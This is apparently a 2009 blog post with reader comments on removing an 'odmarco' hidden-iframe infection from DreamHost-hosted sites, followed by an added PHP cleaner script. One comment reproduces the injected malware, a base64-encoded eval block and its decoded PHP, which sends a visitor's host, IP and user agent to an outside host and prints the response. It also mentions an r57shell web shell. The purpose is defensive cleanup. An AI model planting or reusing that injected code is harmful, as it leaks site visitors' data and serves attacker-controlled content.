Cleaning "infected" file from the odmarco string
I use DreamHost for quite a few sites, both my own and those of friends. Recently I was informed that one of my sites was triggering a warning in anti-virus software, and when I went to investigate, it turned out quite a few sites had been hit by an annoying script that inserts a hidden iframe. Removing all of those by hand would be a tedious job, so I decided to automate it. Given that I don't know much shell scripting but have a firm knowledge of PHP, I decided to give that a go.
First of all, let's look at the hack. At this point I am unsure what exactly caused so many of my files to contain the odmarco string. It looks like quite a few people on DreamHost got hit by this problem, so I am guessing a vulnerable script on one of their servers caused this. I should blame myself as well, because apparently I never noticed that a lot of files in my websites were writable by the server. It's no excuse, but many of the sites I have are very old, from a time when I definitely didn't pay as much attention to such details as I do now.
Anyway, from a comment on SiteAdvisor I learned that the script loaded in the iframe tries to exploit a vulnerability in Adobe Acrobat. Though I hate all stuff like this, I hate exploits more than mere referrer spam injection, so I felt I needed to take care of this quickly, even if a lot of the sites are hardly maintained anymore. So I sat down to hack up a little PHP script that would remove the offending string. Why PHP? Simple: it's the only language I know well enough to hack something like this up in a short time.
After some hacking around I came up with this script. It's not perfect, but it does the job and it does it well, so I'm happy. Anyone interested, feel free to use this script to clear up the mess in your site. It's meant to be run from the command line, inside the directory that you want to (recursively) clean. What I did was put it in the homedir on DreamHost, and then go into a directory that needed cleaning and issue the command:
/usr/local/php5/bin/php ../clear_odmarco.php
As you can see, on DreamHost you need to specify the php5 path explicitly, because for some reason the "php" command still defaults to php4. After that comes the relative path to the clear_odmarco.php file (you could use the full path if you prefer).
April 12, 2009 - tags: odmarco, script, virus, malware, clear, dreamhost, php
Comments
Silvano Girardi Jr.: I had the same problem too. But it wasn't only the iframe, which for me was pointing to google- stats.com instead.
I posted about it on my blog, but it is in Portuguese: http://www.silvano.pro.br/2009/04/10/recomeco/
Let me list these items in English here:
1 - the hidden frame
2 - .htaccess modified to redirect all search engine bots to the cracker's website
3 - malicious PHP code generating random links
eval(base64_decode('JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs='));
the decode results in:
$ch=curl_init("http://usr-52. adsl .md/inc2.php?host=".urlencode($_SERVER["HTTP_HOST"])."&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&agent=".urlencode($_SERVER["HTTP_USER_AGENT"])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;
4 - lots of pages modified with the malicious code at the top
The variable name and value changes for every file.
5 - there was a wp-content/cache.php file, which was actually a php shell called r57shell
6 - there was a big binary file called "core" which I didn't know what it was about.
There were probably more changes, so I decided to get rid of just everything and start from scratch.
Btw, I lost my PageRank too.
Regards
GIF_Tom: Hi, we seem to be having the same problem over here with Odmarco and DreamHost. Funnily enough, when we asked them for support they directed us to your site.
We downloaded the script but we seem to be having trouble executing it. Can you dumb down your explanation for us novice folks. Thanks so much!
left: Hi GIF_Tom,
Could you explain what problems you are having? Any errors? Or what exactly is unclear? I'd be glad to help you. Feel free to e-mail me via the 'who' option in the menu.
Stefan

Bill: You can scrub the iframe from html files quickly from the command line with this oneliner.
find . -name '*.html' -print0 | xargs -0 perl -pi -e 'undef $/; s#
GIF_Tom: Hi Left, I went ahead and wrote you an email further explaining my issues. Just wanted to check in and see if you received it. It was very detailed. Any help you can give me on this subject will be great. If you did not receive it let me know and I will repost it in the comment field.
GIF_Tom
lucia: Thank you, thank you, thank you.
Odmarco changed the name of their image. So, I changed the string to be eliminated and named the script "nameofscript.com".
Then, I loaded the script to my top directory, and ran "http://mydomain.com/nameofscript.php" This worked like a charm. Even the command line averse can do it.
Chris Ramsey: You sir, are a life saver. As a PHP developer I should have thought about writing a script to do this but it never crossed my mind.
Thanks so much for this!

Jack: Hi,
This is a fantastic little script, thank you ever so much for this! It worked on 4 websites I have hosted with DreamHost, but one gave me this error:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/promotions7/domainnamehere.com/clear_odmarco.php on line 7
I think it may be something to do with php4/php5, but I'm not sure how to specify the path for php5. If you could help I would be most grateful.
Many Thanks
Jack
left: Hi Jack,
The error does look very much php4/php5 related. You can specify it to run php5 by using the full path as I mentioned it in my article (/usr/local/php5/bin/php)
Stefan

Jack: Hi Stefan,
Thanks for the quick response. I should have mentioned that I was unable to get the script to work via a custom command from my FTP client (FileZilla), as it kept reporting "500 /USR/LOCAL/PHP5/BIN/PHP not understood".
I managed to put the script into the directory and then run it via my browser: "http://mydomainhere.com/clear_odmarco.php". This worked fine on all of my other sites! What am I doing wrong?
After being hit first in April, I was hit once again last night... what a pest! Thank goodness for your post...
Kind Regards
- Jack
left: The script is meant to be run over an SSH connection into the server. Via FTP this will not work. If you run it via the browser, the error is probably related to the fact that your domain runs php4.
Try connecting through SSH (using a client such as PuTTY for Windows). Be careful with what you do, obviously. The instructions above should suffice once you are connected through SSH.

Dinesh: Hi,
The link to the script file is broken. Can I please have the file. I have the same problem too and I'm on DH.

Dinesh: Aah well, never mind... I found the script in Google's cache...
Gordon: The CORE file is not a virus. It is part of DreamHost's automation system!!! Do not mess with it!!!
----------------------
Thank you for this script.
I saw that your code link is dead, here's a link to a modified version I used to clean up an attack on Dreamhost (6/22/09):
http://forum.animejutsu.com/index.php?topic=116.0

Mik: Hi, good job on writing a script to help sort this out. Unfortunately the link to the script still seems to be broken...
Mik.
Tim Eash: One of our sites was attacked with this "odmarco" infection; it is running osCommerce. I was able to use the script from the site and executed it, and it works almost without flaw. However, I am having a problem cleaning out the 4000 files, because when the script cleans, it leaves behind "white space".
What I mean by white space is, I believe, line breaks. I am not sure. If I open the cleaned file with Notepad I see "a square", but if I use an HTML editor to open it, I see a newline.
But the new line is causing a problem because it's considered "output" and so my session is jacked.
"Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent"
Any ideas as to how I can scrub the infection and not leave a newline at the top of each script?
Thanks,
Tim
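Since the original clear_odmarco.php is no longer linked from the article, here is an added example of the kind of cleaner the article describes. It is not the author's script and not DreamHost's code; it walks the current (or given) directory recursively, removes a hidden iframe that points at a placeholder host name (INJECTED_HOST is an assumption you must replace with the exact string seen in your files), and keeps a .bak copy of every file it rewrites. Two details address points raised in the comments above: the pattern also consumes the line break following the iframe, so no blank line is left at the top of PHP files (the "headers already sent" problem Tim reports), and any eval(base64_decode('...')) block like the one Silvano posted is decoded and reported for manual review rather than removed automatically, since the variable names change from file to file. The list of file extensions scanned is likewise an assumption.

```php
<?php
// clean_iframe.php: added example, not the original clear_odmarco.php.
// Run from an SSH shell on the host, e.g.:
//   /usr/local/php5/bin/php clean_iframe.php --dry-run /path/to/site
// Drop --dry-run to actually rewrite files (a .bak copy of each changed file is kept).

// ASSUMPTION: placeholder for the host name used in the injected iframe; replace it
// with the exact string you see in your infected files.
const INJECTED_HOST = 'injected-host.example';

// Matches a hidden iframe pointing at INJECTED_HOST together with the line break that
// follows it, so that no blank line is left at the top of cleaned PHP files
// (a leading newline counts as output and breaks session_start()).
function iframePattern()
{
    $host = preg_quote(INJECTED_HOST, '~');
    return '~<iframe\b[^>]*' . $host . '[^>]*>.*?</iframe>[ \t]*\r?\n?~is';
}

// Returns the cleaned content; $count receives the number of iframes removed.
function cleanContent($content, &$count)
{
    return preg_replace(iframePattern(), '', $content, -1, $count);
}

// Finds eval(base64_decode('...')) blocks and returns the decoded payloads so they
// can be reviewed by hand; nothing here is executed, only decoded.
function findEncodedEval($content)
{
    $payloads = array();
    $pattern = '~eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=\s]+)[\'"]\s*\)\s*\)~';
    if (preg_match_all($pattern, $content, $m)) {
        foreach ($m[1] as $blob) {
            $decoded = base64_decode(preg_replace('~\s+~', '', $blob), true);
            $payloads[] = ($decoded === false) ? '(not valid base64)' : $decoded;
        }
    }
    return $payloads;
}

// Walks $dir recursively, cleans the iframe out of web files and reports suspicious eval() use.
function cleanTree($dir, $dryRun)
{
    $report = array('cleaned' => array(), 'skipped' => array(), 'suspicious' => array());
    $extensions = array('php', 'html', 'htm', 'js', 'tpl');   // assumption: file types worth scanning
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        if (!$file->isFile() || !in_array(strtolower($file->getExtension()), $extensions, true)) {
            continue;
        }
        $path = $file->getPathname();
        $original = file_get_contents($path);
        if ($original === false) {
            $report['skipped'][] = $path;
            continue;
        }
        foreach (findEncodedEval($original) as $payload) {
            $report['suspicious'][$path][] = substr($payload, 0, 120);   // preview only
        }
        $count = 0;
        $cleaned = cleanContent($original, $count);
        if ($count === 0) {
            continue;
        }
        if (!$dryRun) {
            // Keep a backup before rewriting; skip files we cannot write rather than fail half-way.
            if (!is_writable($path)
                || file_put_contents($path . '.bak', $original) === false
                || file_put_contents($path, $cleaned) === false) {
                $report['skipped'][] = $path;
                continue;
            }
        }
        $report['cleaned'][$path] = $count;
    }
    return $report;
}

if (PHP_SAPI === 'cli') {
    $dryRun = in_array('--dry-run', $argv, true);
    $args = array_values(array_diff(array_slice($argv, 1), array('--dry-run')));
    $report = cleanTree(isset($args[0]) ? $args[0] : getcwd(), $dryRun);
    foreach ($report['cleaned'] as $path => $n) {
        echo ($dryRun ? 'would clean ' : 'cleaned ') . "$path ($n iframe(s))\n";
    }
    foreach ($report['suspicious'] as $path => $payloads) {
        echo "REVIEW $path: " . count($payloads) . " eval(base64_decode()) block(s), first decodes to:\n";
        echo '    ' . str_replace("\n", ' ', $payloads[0]) . "\n";
    }
    foreach ($report['skipped'] as $path) {
        echo "skipped (unreadable or not writable) $path\n";
    }
}
```

Run it with --dry-run first and read the list of files it would touch; only then run it for real. Files flagged with REVIEW are left unchanged on purpose: the decoded preview is there to help you decide whether to restore them from a clean backup, which is also the right answer for anything the cleaner cannot account for, such as a modified .htaccess or an unknown PHP file in an upload or cache directory.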